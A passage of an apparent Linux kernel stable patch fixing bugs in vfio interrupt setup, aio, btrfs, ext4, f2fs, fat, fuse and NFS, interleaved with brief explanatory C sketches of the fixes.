++		vfio_msi_set_vector_signal(vdev, i, -1, msix);
+ 	}
+ 
+-	vfio_msi_set_block(vdev, 0, vdev->num_ctx, NULL, msix);
+-
+ 	cmd = vfio_pci_memory_lock_and_enable(vdev);
+ 	pci_free_irq_vectors(pdev);
+ 	vfio_pci_memory_unlock_and_restore(vdev, cmd);
+@@ -455,11 +493,11 @@ static int vfio_pci_set_intx_unmask(struct vfio_pci_core_device *vdev,
+ 		return -EINVAL;
+ 
+ 	if (flags & VFIO_IRQ_SET_DATA_NONE) {
+-		vfio_pci_intx_unmask(vdev);
++		__vfio_pci_intx_unmask(vdev);
+ 	} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
+ 		uint8_t unmask = *(uint8_t *)data;
+ 		if (unmask)
+-			vfio_pci_intx_unmask(vdev);
++			__vfio_pci_intx_unmask(vdev);
+ 	} else if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
+ 		int32_t fd = *(int32_t *)data;
+ 		if (fd >= 0)
+@@ -482,11 +520,11 @@ static int vfio_pci_set_intx_mask(struct vfio_pci_core_device *vdev,
+ 		return -EINVAL;
+ 
+ 	if (flags & VFIO_IRQ_SET_DATA_NONE) {
+-		vfio_pci_intx_mask(vdev);
++		__vfio_pci_intx_mask(vdev);
+ 	} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
+ 		uint8_t mask = *(uint8_t *)data;
+ 		if (mask)
+-			vfio_pci_intx_mask(vdev);
++			__vfio_pci_intx_mask(vdev);
+ 	} else if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
+ 		return -ENOTTY; /* XXX implement me */
+ 	}
+@@ -507,19 +545,23 @@ static int vfio_pci_set_intx_trigger(struct vfio_pci_core_device *vdev,
+ 		return -EINVAL;
+ 
+ 	if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
++		struct eventfd_ctx *trigger = NULL;
+ 		int32_t fd = *(int32_t *)data;
+ 		int ret;
+ 
+-		if (is_intx(vdev))
+-			return vfio_intx_set_signal(vdev, fd);
++		if (fd >= 0) {
++			trigger = eventfd_ctx_fdget(fd);
++			if (IS_ERR(trigger))
++				return PTR_ERR(trigger);
++		}
+ 
+-		ret = vfio_intx_enable(vdev);
+-		if (ret)
+-			return ret;
++		if (is_intx(vdev))
++			ret = vfio_intx_set_signal(vdev, trigger);
++		else
++			ret = vfio_intx_enable(vdev, trigger);
+ 
+-		ret = vfio_intx_set_signal(vdev, fd);
+-		if (ret)
+-			vfio_intx_disable(vdev);
++		if (ret && trigger)
++			eventfd_ctx_put(trigger);
+ 
+ 		return ret;
+ 	}
+@@ -541,7 +583,7 @@ static int vfio_pci_set_msi_trigger(struct vfio_pci_core_device *vdev,
+ 				    unsigned index, unsigned start,
+ 				    unsigned count, uint32_t flags, void *data)
+ {
+-	int i;
++	unsigned int i;
+ 	bool msix = (index == VFIO_PCI_MSIX_IRQ_INDEX) ? true : false;
+ 
+ 	if (irq_is(vdev, index) && !count && (flags & VFIO_IRQ_SET_DATA_NONE)) {
+diff --git a/drivers/vfio/pci/vfio_pci_rdwr.c b/drivers/vfio/pci/vfio_pci_rdwr.c
+index e352a033b4aef..e27de61ac9fe7 100644
+--- a/drivers/vfio/pci/vfio_pci_rdwr.c
++++ b/drivers/vfio/pci/vfio_pci_rdwr.c
+@@ -470,7 +470,7 @@ int vfio_pci_ioeventfd(struct vfio_pci_core_device *vdev, loff_t offset,
+ 		goto out_unlock;
+ 	}
+ 
+-	ioeventfd = kzalloc(sizeof(*ioeventfd), GFP_KERNEL);
++	ioeventfd = kzalloc(sizeof(*ioeventfd), GFP_KERNEL_ACCOUNT);
+ 	if (!ioeventfd) {
+ 		ret = -ENOMEM;
+ 		goto out_unlock;
+diff --git a/drivers/vfio/platform/vfio_platform_irq.c b/drivers/vfio/platform/vfio_platform_irq.c
+index c5b09ec0a3c98..7f4341a8d7185 100644
+--- a/drivers/vfio/platform/vfio_platform_irq.c
++++ b/drivers/vfio/platform/vfio_platform_irq.c
+@@ -136,6 +136,16 @@ static int vfio_platform_set_irq_unmask(struct vfio_platform_device *vdev,
+ 	return 0;
+ }
+ 
++/*
++ * The trigger eventfd is guaranteed valid in the interrupt path
++ * and protected by the igate mutex when triggered via ioctl.
++ */
++static void vfio_send_eventfd(struct vfio_platform_irq *irq_ctx)
++{
++	if (likely(irq_ctx->trigger))
++		eventfd_signal(irq_ctx->trigger, 1);
++}
++
+ static irqreturn_t vfio_automasked_irq_handler(int irq, void *dev_id)
+ {
+ 	struct vfio_platform_irq *irq_ctx = dev_id;
+@@ -155,7 +165,7 @@ static irqreturn_t vfio_automasked_irq_handler(int irq, void *dev_id)
+ 	spin_unlock_irqrestore(&irq_ctx->lock, flags);
+ 
+ 	if (ret == IRQ_HANDLED)
+-		eventfd_signal(irq_ctx->trigger, 1);
++		vfio_send_eventfd(irq_ctx);
+ 
+ 	return ret;
+ }
+@@ -164,22 +174,19 @@ static irqreturn_t vfio_irq_handler(int irq, void *dev_id)
+ {
+ 	struct vfio_platform_irq *irq_ctx = dev_id;
+ 
+-	eventfd_signal(irq_ctx->trigger, 1);
++	vfio_send_eventfd(irq_ctx);
+ 
+ 	return IRQ_HANDLED;
+ }
+ 
+ static int vfio_set_trigger(struct vfio_platform_device *vdev, int index,
+-			    int fd, irq_handler_t handler)
++			    int fd)
+ {
+ 	struct vfio_platform_irq *irq = &vdev->irqs[index];
+ 	struct eventfd_ctx *trigger;
+-	int ret;
+ 
+ 	if (irq->trigger) {
+-		irq_clear_status_flags(irq->hwirq, IRQ_NOAUTOEN);
+-		free_irq(irq->hwirq, irq);
+-		kfree(irq->name);
++		disable_irq(irq->hwirq);
+ 		eventfd_ctx_put(irq->trigger);
+ 		irq->trigger = NULL;
+ 	}
+@@ -187,30 +194,20 @@ static int vfio_set_trigger(struct vfio_platform_device *vdev, int index,
+ 	if (fd < 0) /* Disable only */
+ 		return 0;
+ 
+-	irq->name = kasprintf(GFP_KERNEL, "vfio-irq[%d](%s)",
+-						irq->hwirq, vdev->name);
+-	if (!irq->name)
+-		return -ENOMEM;
+-
+ 	trigger = eventfd_ctx_fdget(fd);
+-	if (IS_ERR(trigger)) {
+-		kfree(irq->name);
++	if (IS_ERR(trigger))
+ 		return PTR_ERR(trigger);
+-	}
+ 
+ 	irq->trigger = trigger;
+ 
+-	irq_set_status_flags(irq->hwirq, IRQ_NOAUTOEN);
+-	ret = request_irq(irq->hwirq, handler, 0, irq->name, irq);
+-	if (ret) {
+-		kfree(irq->name);
+-		eventfd_ctx_put(trigger);
+-		irq->trigger = NULL;
+-		return ret;
+-	}
+-
+-	if (!irq->masked)
+-		enable_irq(irq->hwirq);
++	/*
++	 * irq->masked effectively provides nested disables within the overall
++	 * enable relative to trigger.  Specifically, request_irq() is called
++	 * with NO_AUTOEN, therefore the IRQ is initially disabled.  The user
++	 * may only further disable the IRQ with a MASK operation because
++	 * irq->masked is initially false.
++	 */
++	enable_irq(irq->hwirq);
+ 
+ 	return 0;
+ }
+@@ -229,7 +226,7 @@ static int vfio_platform_set_irq_trigger(struct vfio_platform_device *vdev,
+ 		handler = vfio_irq_handler;
+ 
+ 	if (!count && (flags & VFIO_IRQ_SET_DATA_NONE))
+-		return vfio_set_trigger(vdev, index, -1, handler);
++		return vfio_set_trigger(vdev, index, -1);
+ 
+ 	if (start != 0 || count != 1)
+ 		return -EINVAL;
+@@ -237,7 +234,7 @@ static int vfio_platform_set_irq_trigger(struct vfio_platform_device *vdev,
+ 	if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
+ 		int32_t fd = *(int32_t *)data;
+ 
+-		return vfio_set_trigger(vdev, index, fd, handler);
++		return vfio_set_trigger(vdev, index, fd);
+ 	}
+ 
+ 	if (flags & VFIO_IRQ_SET_DATA_NONE) {
+@@ -261,6 +258,14 @@ int vfio_platform_set_irqs_ioctl(struct vfio_platform_device *vdev,
+ 		    unsigned start, unsigned count, uint32_t flags,
+ 		    void *data) = NULL;
+ 
++	/*
++	 * For compatibility, errors from request_irq() are local to the
++	 * SET_IRQS path and reflected in the name pointer.  This allows,
++	 * for example, polling mode fallback for an exclusive IRQ failure.
++	 */
++	if (IS_ERR(vdev->irqs[index].name))
++		return PTR_ERR(vdev->irqs[index].name);
++
+ 	switch (flags & VFIO_IRQ_SET_ACTION_TYPE_MASK) {
+ 	case VFIO_IRQ_SET_ACTION_MASK:
+ 		func = vfio_platform_set_irq_mask;
+@@ -281,7 +286,7 @@ int vfio_platform_set_irqs_ioctl(struct vfio_platform_device *vdev,
+ 
+ int vfio_platform_irq_init(struct vfio_platform_device *vdev)
+ {
+-	int cnt = 0, i;
++	int cnt = 0, i, ret = 0;
+ 
+ 	while (vdev->get_irq(vdev, cnt) >= 0)
+ 		cnt++;
+@@ -292,37 +297,70 @@ int vfio_platform_irq_init(struct vfio_platform_device *vdev)
+ 
+ 	for (i = 0; i < cnt; i++) {
+ 		int hwirq = vdev->get_irq(vdev, i);
++		irq_handler_t handler = vfio_irq_handler;
+ 
+-		if (hwirq < 0)
++		if (hwirq < 0) {
++			ret = -EINVAL;
+ 			goto err;
++		}
+ 
+ 		spin_lock_init(&vdev->irqs[i].lock);
+ 
+ 		vdev->irqs[i].flags = VFIO_IRQ_INFO_EVENTFD;
+ 
+-		if (irq_get_trigger_type(hwirq) & IRQ_TYPE_LEVEL_MASK)
++		if (irq_get_trigger_type(hwirq) & IRQ_TYPE_LEVEL_MASK) {
+ 			vdev->irqs[i].flags |= VFIO_IRQ_INFO_MASKABLE
+ 						| VFIO_IRQ_INFO_AUTOMASKED;
++			handler = vfio_automasked_irq_handler;
++		}
+ 
+ 		vdev->irqs[i].count = 1;
+ 		vdev->irqs[i].hwirq = hwirq;
+ 		vdev->irqs[i].masked = false;
++		vdev->irqs[i].name = kasprintf(GFP_KERNEL,
++					       "vfio-irq[%d](%s)", hwirq,
++					       vdev->name);
++		if (!vdev->irqs[i].name) {
++			ret = -ENOMEM;
++			goto err;
++		}
++
++		ret = request_irq(hwirq, handler, IRQF_NO_AUTOEN,
++				  vdev->irqs[i].name, &vdev->irqs[i]);
++		if (ret) {
++			kfree(vdev->irqs[i].name);
++			vdev->irqs[i].name = ERR_PTR(ret);
++		}
+ 	}
+ 
+ 	vdev->num_irqs = cnt;
+ 
+ 	return 0;
+ err:
++	for (--i; i >= 0; i--) {
++		if (!IS_ERR(vdev->irqs[i].name)) {
++			free_irq(vdev->irqs[i].hwirq, &vdev->irqs[i]);
++			kfree(vdev->irqs[i].name);
++		}
++	}
+ 	kfree(vdev->irqs);
+-	return -EINVAL;
++	return ret;
+ }
+ 
+ void vfio_platform_irq_cleanup(struct vfio_platform_device *vdev)
+ {
+ 	int i;
+ 
+-	for (i = 0; i < vdev->num_irqs; i++)
+-		vfio_set_trigger(vdev, i, -1, NULL);
++	for (i = 0; i < vdev->num_irqs; i++) {
++		vfio_virqfd_disable(&vdev->irqs[i].mask);
++		vfio_virqfd_disable(&vdev->irqs[i].unmask);
++		if (!IS_ERR(vdev->irqs[i].name)) {
++			free_irq(vdev->irqs[i].hwirq, &vdev->irqs[i]);
++			if (vdev->irqs[i].trigger)
++				eventfd_ctx_put(vdev->irqs[i].trigger);
++			kfree(vdev->irqs[i].name);
++		}
++	}
+ 
+ 	vdev->num_irqs = 0;
+ 	kfree(vdev->irqs);
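
The hunks above park a request_irq() failure in the per-IRQ name pointer, and vfio_platform_set_irqs_ioctl() later decodes it with IS_ERR()/PTR_ERR() so the error surfaces only when userspace actually configures that IRQ. A minimal userspace sketch of this encode-an-errno-in-a-pointer idiom; the ERR_PTR helpers are simplified stand-ins for the kernel's and all names are illustrative:

#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_ERRNO 4095

static inline void *ERR_PTR(long err) { return (void *)err; }
static inline long PTR_ERR(const void *ptr) { return (long)ptr; }
static inline int IS_ERR(const void *ptr)
{
	return (uintptr_t)ptr >= (uintptr_t)-MAX_ERRNO;
}

struct fake_irq {
	char *name;	/* valid string, or ERR_PTR(-errno) from setup */
};

static void fake_irq_init(struct fake_irq *irq, int request_irq_ret)
{
	irq->name = strdup("vfio-irq[0](demo)");
	if (request_irq_ret) {		/* pretend request_irq() failed */
		free(irq->name);
		irq->name = ERR_PTR(request_irq_ret);
	}
}

int main(void)
{
	struct fake_irq irq;

	fake_irq_init(&irq, -EINVAL);
	if (IS_ERR(irq.name))		/* replayed at SET_IRQS time */
		printf("deferred request_irq error: %ld\n", PTR_ERR(irq.name));
	else
		free(irq.name);
	return 0;
}

Deferring the error this way is what keeps the polling-mode fallback mentioned in the comment workable: probe succeeds, and only the SET_IRQS path reports the exclusive-IRQ failure.
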
+diff --git a/drivers/vfio/virqfd.c b/drivers/vfio/virqfd.c
+index 414e98d82b02e..e06b32ddedced 100644
+--- a/drivers/vfio/virqfd.c
++++ b/drivers/vfio/virqfd.c
+@@ -104,6 +104,13 @@ static void virqfd_inject(struct work_struct *work)
+ 		virqfd->thread(virqfd->opaque, virqfd->data);
+ }
+ 
++static void virqfd_flush_inject(struct work_struct *work)
++{
++	struct virqfd *virqfd = container_of(work, struct virqfd, flush_inject);
++
++	flush_work(&virqfd->inject);
++}
++
+ int vfio_virqfd_enable(void *opaque,
+ 		       int (*handler)(void *, void *),
+ 		       void (*thread)(void *, void *),
+@@ -115,7 +122,7 @@ int vfio_virqfd_enable(void *opaque,
+ 	int ret = 0;
+ 	__poll_t events;
+ 
+-	virqfd = kzalloc(sizeof(*virqfd), GFP_KERNEL);
++	virqfd = kzalloc(sizeof(*virqfd), GFP_KERNEL_ACCOUNT);
+ 	if (!virqfd)
+ 		return -ENOMEM;
+ 
+@@ -127,6 +134,7 @@ int vfio_virqfd_enable(void *opaque,
+ 
+ 	INIT_WORK(&virqfd->shutdown, virqfd_shutdown);
+ 	INIT_WORK(&virqfd->inject, virqfd_inject);
++	INIT_WORK(&virqfd->flush_inject, virqfd_flush_inject);
+ 
+ 	irqfd = fdget(fd);
+ 	if (!irqfd.file) {
+@@ -217,6 +225,19 @@ void vfio_virqfd_disable(struct virqfd **pvirqfd)
+ }
+ EXPORT_SYMBOL_GPL(vfio_virqfd_disable);
+ 
++void vfio_virqfd_flush_thread(struct virqfd **pvirqfd)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&virqfd_lock, flags);
++	if (*pvirqfd && (*pvirqfd)->thread)
++		queue_work(vfio_irqfd_cleanup_wq, &(*pvirqfd)->flush_inject);
++	spin_unlock_irqrestore(&virqfd_lock, flags);
++
++	flush_workqueue(vfio_irqfd_cleanup_wq);
++}
++EXPORT_SYMBOL_GPL(vfio_virqfd_flush_thread);
++
+ module_init(vfio_virqfd_init);
+ module_exit(vfio_virqfd_exit);
+ 
+diff --git a/fs/aio.c b/fs/aio.c
+index 849c3e3ed558b..3e3bf6fdc5ab6 100644
+--- a/fs/aio.c
++++ b/fs/aio.c
+@@ -591,8 +591,8 @@ static int aio_setup_ring(struct kioctx *ctx, unsigned int nr_events)
+ 
+ void kiocb_set_cancel_fn(struct kiocb *iocb, kiocb_cancel_fn *cancel)
+ {
+-	struct aio_kiocb *req = container_of(iocb, struct aio_kiocb, rw);
+-	struct kioctx *ctx = req->ki_ctx;
++	struct aio_kiocb *req;
++	struct kioctx *ctx;
+ 	unsigned long flags;
+ 
+ 	/*
+@@ -602,9 +602,13 @@ void kiocb_set_cancel_fn(struct kiocb *iocb, kiocb_cancel_fn *cancel)
+ 	if (!(iocb->ki_flags & IOCB_AIO_RW))
+ 		return;
+ 
++	req = container_of(iocb, struct aio_kiocb, rw);
++
+ 	if (WARN_ON_ONCE(!list_empty(&req->ki_list)))
+ 		return;
+ 
++	ctx = req->ki_ctx;
++
+ 	spin_lock_irqsave(&ctx->ctx_lock, flags);
+ 	list_add_tail(&req->ki_list, &ctx->active_reqs);
+ 	req->ki_cancel = cancel;
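
The aio fix above computes container_of() only after the IOCB_AIO_RW flag confirms this kiocb really is embedded in an aio_kiocb; for a kiocb that is not, the mapped-back pointer would land in unrelated memory and reading ki_ctx through it would be out of bounds. A standalone sketch of the check-before-container_of ordering, with illustrative types:

#include <stddef.h>
#include <stdio.h>

#define container_of(ptr, type, member) \
	((type *)((char *)(ptr) - offsetof(type, member)))

#define IOCB_AIO_RW 1

struct kiocb { int ki_flags; };
struct aio_kiocb { long ki_ctx; struct kiocb rw; };

static void set_cancel(struct kiocb *iocb)
{
	struct aio_kiocb *req;

	if (!(iocb->ki_flags & IOCB_AIO_RW))
		return;		/* not embedded: bail out before mapping back */

	req = container_of(iocb, struct aio_kiocb, rw);
	printf("ctx=%ld\n", req->ki_ctx);	/* safe to dereference now */
}

int main(void)
{
	struct aio_kiocb a = { .ki_ctx = 42, .rw = { .ki_flags = IOCB_AIO_RW } };
	struct kiocb standalone = { .ki_flags = 0 };

	set_cancel(&a.rw);
	set_cancel(&standalone);	/* would read garbage without the check */
	return 0;
}
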
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 9f77565bd7f5a..5993b627be580 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1413,7 +1413,8 @@ void btrfs_delete_unused_bgs(struct btrfs_fs_info *fs_info)
+ 		 * needing to allocate extents from the block group.
+ 		 */
+ 		used = btrfs_space_info_used(space_info, true);
+-		if (space_info->total_bytes - block_group->length < used) {
++		if (space_info->total_bytes - block_group->length < used &&
++		    block_group->zone_unusable < block_group->length) {
+ 			/*
+ 			 * Add a reference for the list, compensate for the ref
+ 			 * drop under the "next" label for the
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index b3472bf6b288f..c14d4f70e84bd 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -2800,11 +2800,6 @@ int btrfs_qgroup_account_extents(struct btrfs_trans_handle *trans)
+ 					goto cleanup;
+ 			}
+ 
+-			/* Free the reserved data space */
+-			btrfs_qgroup_free_refroot(fs_info,
+-					record->data_rsv_refroot,
+-					record->data_rsv,
+-					BTRFS_QGROUP_RSV_DATA);
+ 			/*
+ 			 * Use BTRFS_SEQ_LAST as time_seq to do special search,
+ 			 * which doesn't lock tree or delayed_refs and search
+@@ -2826,6 +2821,11 @@ int btrfs_qgroup_account_extents(struct btrfs_trans_handle *trans)
+ 			record->old_roots = NULL;
+ 			new_roots = NULL;
+ 		}
++		/* Free the reserved data space */
++		btrfs_qgroup_free_refroot(fs_info,
++				record->data_rsv_refroot,
++				record->data_rsv,
++				BTRFS_QGROUP_RSV_DATA);
+ cleanup:
+ 		ulist_free(record->old_roots);
+ 		ulist_free(new_roots);
+diff --git a/fs/btrfs/scrub.c b/fs/btrfs/scrub.c
+index 1672d4846baaf..12a2b1e3f1e35 100644
+--- a/fs/btrfs/scrub.c
++++ b/fs/btrfs/scrub.c
+@@ -4177,7 +4177,17 @@ static noinline_for_stack int scrub_supers(struct scrub_ctx *sctx,
+ 		gen = fs_info->last_trans_committed;
+ 
+ 	for (i = 0; i < BTRFS_SUPER_MIRROR_MAX; i++) {
+-		bytenr = btrfs_sb_offset(i);
++		ret = btrfs_sb_log_location(scrub_dev, i, 0, &bytenr);
++		if (ret == -ENOENT)
++			break;
++
++		if (ret) {
++			spin_lock(&sctx->stat_lock);
++			sctx->stat.super_errors++;
++			spin_unlock(&sctx->stat_lock);
++			continue;
++		}
++
+ 		if (bytenr + BTRFS_SUPER_INFO_SIZE >
+ 		    scrub_dev->commit_total_bytes)
+ 			break;
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 6fc2d99270c18..03cfb425ea4ea 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -1444,7 +1444,7 @@ static bool contains_pending_extent(struct btrfs_device *device, u64 *start,
+ 
+ 		if (in_range(physical_start, *start, len) ||
+ 		    in_range(*start, physical_start,
+-			     physical_end - physical_start)) {
++			     physical_end + 1 - physical_start)) {
+ 			*start = physical_end + 1;
+ 			return true;
+ 		}
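
The btrfs change corrects an inclusive-bound length: physical_end names the last byte of the extent, so the extent spans physical_end + 1 - physical_start bytes. A toy demonstration of the off-by-one; in_range() here is a simplified stand-in for the kernel's half-open helper:

#include <stdio.h>

#define in_range(b, first, len) ((b) >= (first) && (b) < (first) + (len))

int main(void)
{
	unsigned long physical_start = 0, physical_end = 4095;

	/* old length misses the extent's final byte */
	printf("%d\n", in_range(4095UL, physical_start,
				physical_end - physical_start));	/* 0 */
	/* fixed length covers the inclusive end */
	printf("%d\n", in_range(4095UL, physical_start,
				physical_end + 1 - physical_start));	/* 1 */
	return 0;
}
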
+diff --git a/fs/exec.c b/fs/exec.c
+index 39f7751c90fc3..b01434d6a512d 100644
+--- a/fs/exec.c
++++ b/fs/exec.c
+@@ -896,6 +896,7 @@ int transfer_args_to_stack(struct linux_binprm *bprm,
+ 			goto out;
+ 	}
+ 
++	bprm->exec += *sp_location - MAX_ARG_PAGES * PAGE_SIZE;
+ 	*sp_location = sp;
+ 
+ out:
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 6a3e27771df73..bc0ca45a5d817 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -4684,10 +4684,16 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 			.fe_len = ac->ac_g_ex.fe_len,
+ 		};
+ 		loff_t orig_goal_end = extent_logical_end(sbi, &ex);
++		loff_t o_ex_end = extent_logical_end(sbi, &ac->ac_o_ex);
+ 
+-		/* we can't allocate as much as normalizer wants.
+-		 * so, found space must get proper lstart
+-		 * to cover original request */
++		/*
++		 * We can't allocate as much as normalizer wants, so we try
++		 * to get proper lstart to cover the original request, except
++		 * when the goal doesn't cover the original request as below:
++		 *
++		 * orig_ex:2045/2055(10), isize:8417280 -> normalized:0/2048
++		 * best_ex:0/200(200) -> adjusted: 1848/2048(200)
++		 */
+ 		BUG_ON(ac->ac_g_ex.fe_logical > ac->ac_o_ex.fe_logical);
+ 		BUG_ON(ac->ac_g_ex.fe_len < ac->ac_o_ex.fe_len);
+ 
+@@ -4699,7 +4705,7 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 		 * 1. Check if best ex can be kept at end of goal and still
+ 		 *    cover original start
+ 		 * 2. Else, check if best ex can be kept at start of goal and
+-		 *    still cover original start
++		 *    still cover original end
+ 		 * 3. Else, keep the best ex at start of original request.
+ 		 */
+ 		ex.fe_len = ac->ac_b_ex.fe_len;
+@@ -4709,7 +4715,7 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 			goto adjust_bex;
+ 
+ 		ex.fe_logical = ac->ac_g_ex.fe_logical;
+-		if (ac->ac_o_ex.fe_logical < extent_logical_end(sbi, &ex))
++		if (o_ex_end <= extent_logical_end(sbi, &ex))
+ 			goto adjust_bex;
+ 
+ 		ex.fe_logical = ac->ac_o_ex.fe_logical;
+@@ -4717,7 +4723,6 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 		ac->ac_b_ex.fe_logical = ex.fe_logical;
+ 
+ 		BUG_ON(ac->ac_o_ex.fe_logical < ac->ac_b_ex.fe_logical);
+-		BUG_ON(ac->ac_o_ex.fe_len > ac->ac_b_ex.fe_len);
+ 		BUG_ON(extent_logical_end(sbi, &ex) > orig_goal_end);
+ 	}
+ 
+diff --git a/fs/ext4/resize.c b/fs/ext4/resize.c
+index f2ed15af703a8..38ce42396758d 100644
+--- a/fs/ext4/resize.c
++++ b/fs/ext4/resize.c
+@@ -1606,7 +1606,8 @@ static int ext4_flex_group_add(struct super_block *sb,
+ 		int gdb_num = group / EXT4_DESC_PER_BLOCK(sb);
+ 		int gdb_num_end = ((group + flex_gd->count - 1) /
+ 				   EXT4_DESC_PER_BLOCK(sb));
+-		int meta_bg = ext4_has_feature_meta_bg(sb);
++		int meta_bg = ext4_has_feature_meta_bg(sb) &&
++			      gdb_num >= le32_to_cpu(es->s_first_meta_bg);
+ 		sector_t padding_blocks = meta_bg ? 0 : sbi->s_sbh->b_blocknr -
+ 					 ext4_group_first_block_no(sb, 0);
+ 		sector_t old_gdb = 0;
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 5ae1c4aa3ae92..b54d681c6457d 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -3000,6 +3000,7 @@ static inline void __mark_inode_dirty_flag(struct inode *inode,
+ 	case FI_INLINE_DOTS:
+ 	case FI_PIN_FILE:
+ 	case FI_COMPRESS_RELEASED:
++	case FI_ATOMIC_COMMITTED:
+ 		f2fs_mark_inode_dirty_sync(inode, true);
+ 	}
+ }
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index aa1ba2fdfe00d..205216c1db91f 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -192,6 +192,9 @@ void f2fs_abort_atomic_write(struct inode *inode, bool clean)
+ 	if (!f2fs_is_atomic_file(inode))
+ 		return;
+ 
++	if (clean)
++		truncate_inode_pages_final(inode->i_mapping);
++
+ 	release_atomic_write_cnt(inode);
+ 	clear_inode_flag(inode, FI_ATOMIC_COMMITTED);
+ 	clear_inode_flag(inode, FI_ATOMIC_FILE);
+@@ -200,7 +203,6 @@ void f2fs_abort_atomic_write(struct inode *inode, bool clean)
+ 	F2FS_I(inode)->atomic_write_task = NULL;
+ 
+ 	if (clean) {
+-		truncate_inode_pages_final(inode->i_mapping);
+ 		f2fs_i_size_write(inode, fi->original_i_size);
+ 		fi->original_i_size = 0;
+ 	}
+diff --git a/fs/fat/nfs.c b/fs/fat/nfs.c
+index af191371c3529..bab63eeaf9cbc 100644
+--- a/fs/fat/nfs.c
++++ b/fs/fat/nfs.c
+@@ -130,6 +130,12 @@ fat_encode_fh_nostale(struct inode *inode, __u32 *fh, int *lenp,
+ 		fid->parent_i_gen = parent->i_generation;
+ 		type = FILEID_FAT_WITH_PARENT;
+ 		*lenp = FAT_FID_SIZE_WITH_PARENT;
++	} else {
++		/*
++		 * We need to initialize this field because the fh is actually
++		 * 12 bytes long
++		 */
++		fid->parent_i_pos_hi = 0;
+ 	}
+ 
+ 	return type;
+diff --git a/fs/fuse/dir.c b/fs/fuse/dir.c
+index 5e408e7ec4c6b..936a24b646cef 100644
+--- a/fs/fuse/dir.c
++++ b/fs/fuse/dir.c
+@@ -399,6 +399,10 @@ int fuse_lookup_name(struct super_block *sb, u64 nodeid, const struct qstr *name
+ 		goto out_put_forget;
+ 	if (fuse_invalid_attr(&outarg->attr))
+ 		goto out_put_forget;
++	if (outarg->nodeid == FUSE_ROOT_ID && outarg->generation != 0) {
++		pr_warn_once("root generation should be zero\n");
++		outarg->generation = 0;
++	}
+ 
+ 	*inode = fuse_iget(sb, outarg->nodeid, outarg->generation,
+ 			   &outarg->attr, entry_attr_timeout(outarg),
+diff --git a/fs/fuse/fuse_i.h b/fs/fuse/fuse_i.h
+index a9681fecbd91f..253b9b78d6f13 100644
+--- a/fs/fuse/fuse_i.h
++++ b/fs/fuse/fuse_i.h
+@@ -923,7 +923,6 @@ static inline bool fuse_stale_inode(const struct inode *inode, int generation,
+ 
+ static inline void fuse_make_bad(struct inode *inode)
+ {
+-	remove_inode_hash(inode);
+ 	set_bit(FUSE_I_BAD, &get_fuse_inode(inode)->state);
+ }
+ 
+diff --git a/fs/fuse/inode.c b/fs/fuse/inode.c
+index f81000d968875..367e3b276092f 100644
+--- a/fs/fuse/inode.c
++++ b/fs/fuse/inode.c
+@@ -445,8 +445,11 @@ struct inode *fuse_iget(struct super_block *sb, u64 nodeid,
+ 	} else if (fuse_stale_inode(inode, generation, attr)) {
+ 		/* nodeid was reused, any I/O on the old inode should fail */
+ 		fuse_make_bad(inode);
+-		iput(inode);
+-		goto retry;
++		if (inode != d_inode(sb->s_root)) {
++			remove_inode_hash(inode);
++			iput(inode);
++			goto retry;
++		}
+ 	}
+ 	fi = get_fuse_inode(inode);
+ 	spin_lock(&fi->lock);
+diff --git a/fs/nfs/direct.c b/fs/nfs/direct.c
+index 8fdb65e1b14a3..b555efca01d20 100644
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -647,10 +647,17 @@ static void nfs_direct_commit_schedule(struct nfs_direct_req *dreq)
+ 	LIST_HEAD(mds_list);
+ 
+ 	nfs_init_cinfo_from_dreq(&cinfo, dreq);
++	nfs_commit_begin(cinfo.mds);
+ 	nfs_scan_commit(dreq->inode, &mds_list, &cinfo);
+ 	res = nfs_generic_commit_list(dreq->inode, &mds_list, 0, &cinfo);
+-	if (res < 0) /* res == -ENOMEM */
+-		nfs_direct_write_reschedule(dreq);
++	if (res < 0) { /* res == -ENOMEM */
++		spin_lock(&dreq->lock);
++		if (dreq->flags == 0)
++			dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
++		spin_unlock(&dreq->lock);
++	}
++	if (nfs_commit_end(cinfo.mds))
++		nfs_direct_write_complete(dreq);
+ }
+ 
+ static void nfs_direct_write_clear_reqs(struct nfs_direct_req *dreq)
+diff --git a/fs/nfs/write.c b/fs/nfs/write.c
+index 6a06066684172..8e21caae4cae2 100644
+--- a/fs/nfs/write.c
++++ b/fs/nfs/write.c
+@@ -1656,7 +1656,7 @@ static int wait_on_commit(struct nfs_mds_commit_info *cinfo)
+ 				       !atomic_read(&cinfo->rpcs_out));
+ }
+ 
+-static void nfs_commit_begin(struct nfs_mds_commit_info *cinfo)
++void nfs_commit_begin(struct nfs_mds_commit_info *cinfo)
+ {
+ 	atomic_inc(&cinfo->rpcs_out);
+ }
+diff --git a/fs/nfsd/trace.h b/fs/nfsd/trace.h
